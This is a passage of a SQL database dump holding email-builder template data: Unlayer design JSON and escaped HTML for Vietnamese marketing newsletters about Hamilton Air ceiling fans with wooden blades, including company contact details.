https:\\/\\/www.facebook.com\\/bigfans.vn\\\",\\\"name\\\":\\\"Facebook\\\"},{\\\"url\\\":\\\" https:\\/\\/twitter.com\\/hgpco\\\",\\\"name\\\":\\\"Twitter\\\"},{\\\"url\\\":\\\" https:\\/\\/www.linkedin.com\\/company\\/hogiaphat\\/\\\",\\\"name\\\":\\\"LinkedIn\\\"},{\\\"url\\\":\\\" https:\\/\\/www.instagram.com\\/quatcaocap\\/\\\",\\\"name\\\":\\\"Instagram\\\"},{\\\"url\\\":\\\" https:\\/\\/www.youtube.com\\/channel\\/UCKlFoDwgsjdlMD9gxwQYPVw\\\",\\\"name\\\":\\\"YouTube\\\"}],\\\"editor\\\":{\\\"data\\\":{\\\"showDefaultIcons\\\":true,\\\"showDefaultOptions\\\":true,\\\"customIcons\\\":[],\\\"customOptions\\\":[]}}},\\\"align\\\":\\\"center\\\",\\\"spacing\\\":19,\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_social_1\\\",\\\"htmlClassNames\\\":\\\"u_content_social\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"_override\\\":{\\\"mobile\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"hideMobile\\\":false}}}},{\\\"id\\\":\\\"U54rwmEkOc\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"23px 40px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#b8b8b8\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">-------o0o------<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\u2198\\ufe0f Office &amp; Showroom: 304 Tr\\u01b0\\u01a1ng V\\u0103n Bang, Th\\u1ea1nh M\\u1ef9 L\\u1ee3i, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp H\\u1ed3 Ch\\u00ed Minh.<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\ud83d\\udc8c Email: sale@hogiaphat.vn<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\u260e\\ufe0f T\\u01b0 v\\u1ea5n B\\u00e1n H\\u00e0ng: 0913 123860<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\ud83d\\udcde Hotline: 028 730 333 69<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\u00a0<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\u00a0\\u25b9\\u25b9\\u25b9Tổ chức đào tạo WIT\\/H\\u1ed3 Gia Ph\\u00e1t \\u25b9\\u25b9\\u25b9<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\u2705 Mang \\u0111\\u1ebfn gi\\u1ea3i ph\\u00e1p qu\\u1ea1t l\\u00e0m m\\u00e1t ti\\u1ec7n nghi &amp; tr\\u1ea3i nghi\\u1ec7m t\\u1ed1t h\\u01a1n cho gia \\u0111\\u00ecnh nh\\u00e0 \\u1edf ho\\u1eb7c doanh nghi\\u1ec7p c\\u1ee7a b\\u1ea1n<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\u2622\\ufe0f D\\u00e0nh cho nh\\u00e0 x\\u01b0\\u1edfng, c\\u00f4ng nghi\\u1ec7p, v\\u0103n ph\\u00f2ng th\\u01b0\\u01a1ng m\\u1ea1i, nh\\u00e0 \\u1edf cao c\\u1ea5p.<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\u267b\\ufe0f\\u00a0 S\\u1ef1 quan t\\u00e2m c\\u1ee7a ch\\u00fang t\\u00f4i l\\u00e0 s\\u1eed d\\u1ee5ng n\\u0103ng l\\u01b0\\u1ee3ng hi\\u1ec7u qu\\u1ea3.\\u00a0<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\ud83c\\udf10 <a href=\\\\\\\"https:\\/\\/www.bigfans.vn\\\\\\\">https:\\/\\/www.bigfans.vn<\\/a><\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\ud83c\\udf10 <a href=\\\\\\\"https:\\/\\/quattran.co\\\\\\\">https:\\/\\/quattran.co<\\/a><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"8hu9zilO_e\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"91%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#616888\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"19px 19px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_2\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"N9ssy1A_Ok\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 40px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#bbbbbb\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_6\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 16.8px;\\\\\\\">\\u00a9Hamiton Air Fans\\u2122. All Rights Reserved.<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 16.8px;\\\\\\\">C\\u00d4NG TY C\\u1ed4 PH\\u1ea6N C\\u00d4NG NGH\\u1ec6 HAMILTON AIR<br \\/>MST: 0315778682 do s\\u1edf KH v\\u00e0 \\u0111\\u1ea7u t\\u01b0 Tp.HCM.\\u00a0<\\/span><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_6\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#272362\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_5\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"headers\\\":[],\\\"footers\\\":[],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Open Sans\\\",\\\"value\\\":\\\"\'Open Sans\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\",\\\"defaultFont\\\":true},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"cover\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#363675\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":false,\\\"linkHoverUnderline\\\":true,\\\"inherit\\\":false},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":16}\"', '', 1, '2023-02-27 19:51:59');
INSERT INTO `tblma_email_templates` (`id`, `name`, `color`, `category`, `published`, `language`, `data_html`, `data_design`, `description`, `addedfrom`, `dateadded`) VALUES
(10, 'Quat Tran Canh Go', '', 0, 1, 'english', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 820px) {\\r\\n  .u-row {\\r\\n    width: 800px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-50 {\\r\\n    width: 400px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 800px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 820px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\nbody {\\r\\n  margin: 0;\\r\\n  padding: 0;\\r\\n}\\r\\n\\r\\ntable,\\r\\ntr,\\r\\ntd {\\r\\n  vertical-align: top;\\r\\n  border-collapse: collapse;\\r\\n}\\r\\n\\r\\np {\\r\\n  margin: 0;\\r\\n}\\r\\n\\r\\n.ie-container table,\\r\\n.mso-container table {\\r\\n  table-layout: fixed;\\r\\n}\\r\\n\\r\\n* {\\r\\n  line-height: inherit;\\r\\n}\\r\\n\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\ntable, td { color: #000000; } #u_body a { color: #683d0d; text-decoration: none; }\\r\\n    <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Source+Sans+Pro:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #ffffff;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table id=\\\"u_body\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #ffffff;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n    \\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 800px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #0c6097;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:800px;\\\"><tr style=\\\"background-color: #0c6097;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"800\\\" style=\\\"width: 800px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 800px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:40px 10px 19px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677921547793-log_hq.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 780px;\\\" width=\\\"780\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 0px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">G\\u1ed7 t\\u1ef1 nhi\\u00ean | Gi\\u1ea3 v\\u00e2n g\\u1ed7 | G\\u1ed7 \\u00e9p<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 26px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677921240188-tobago.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 780px;\\\" width=\\\"780\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; color: #ecf0f1; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 20px; \\\">C\\u00c1NH G\\u1ed6 T\\u1ef0 NHI\\u00caN CH\\u1ea4T L\\u01af\\u1ee2NG - TU\\u1ef2 CH\\u1eccN \\u0110\\u01af\\u1ee2C M\\u00c0U S\\u1eaeC<\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 800px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:800px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"800\\\" style=\\\"width: 800px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 800px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: inherit; font-size: 13px; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">Xu h\\u01b0\\u1edbng l\\u00e0m m\\u00e1t ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n v\\u00e0 ph\\u00f9 h\\u1ee3p v\\u1edbi ki\\u1ebfn tr\\u00fac kh\\u00f4ng gian n\\u1ed9i th\\u1ea5t nh\\u00e0 \\u1edf Vi\\u1ec7t Nam. S\\u1eed d\\u1ee5ng qu\\u1ea1t tr\\u1ea7n s\\u1ebd gi\\u00fap b\\u1ea1n ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n chi phi ti\\u1ec1n \\u0111i\\u1ec7n h\\u00e0ng th\\u00e1ng. V\\u00e0o m\\u00f9a h\\u00e8 qu\\u1ea1t tr\\u1ea7n k\\u1ebft h\\u1ee3p v\\u1edbi \\u0111i\\u1ec1u ho\\u00e0 kh\\u00f4ng kh\\u00ed b\\u1ea1n s\\u1ebd t\\u0103ng th\\u00eam 2-5oC, m\\u1ed7i \\u0111\\u1ed9 C b\\u1ea1n t\\u0103ng t\\u1eeb h\\u1ec7 th\\u1ed1ng \\u0111i\\u1ec1u ho\\u00e0 s\\u1ebd ti\\u1ebft ki\\u1ec7m 5% chi ph\\u00ed \\u0111i\\u1ec7n h\\u00e0ng th\\u00e1ng.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 800px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:800px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"400\\\" style=\\\"width: 400px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 400px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:28px 33px 25px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #444444; line-height: 200%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 200%;\\\"><span style=\\\"font-family: inherit; line-height: 24px; font-size: 12px;\\\">Qu\\u1ea1t tr\\u1ea7n c\\u00e1nh g\\u1ed7 <strong>WOOD t\\u1ef1 nhi\\u00ean<\\/strong>. Hi\\u1ec7n nay qu\\u1ea1t tr\\u1ea7n c\\u00e1nh g\\u1ed7 t\\u1ef1 nhi\\u00ean qua x\\u1eed l\\u00fd ch\\u1ed1ng cong v\\u00eanh ho\\u1eb7c \\u0111\\u01b0\\u1ee3c x\\u1eed l\\u00fd th\\u00e0nh t\\u1ea5m nguy\\u00ean kh\\u1ed1i \\u0111ang \\u0111\\u01b0\\u1ee3c nhi\\u1ec1u ng\\u01b0\\u1eddi \\u01b0a chu\\u1ed9ng b\\u1edfi t\\u00ednh \\u0111\\u1ed9c \\u0111\\u00e1o v\\u00e0 ph\\u00f9 h\\u1ee3p v\\u1edbi c\\u00e1c thi\\u1ebft k\\u1ebf n\\u1ed9i th\\u1ea5t hi\\u1ec7n nay.<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 200%;\\\"><span style=\\\"font-family: inherit; line-height: 24px; font-size: 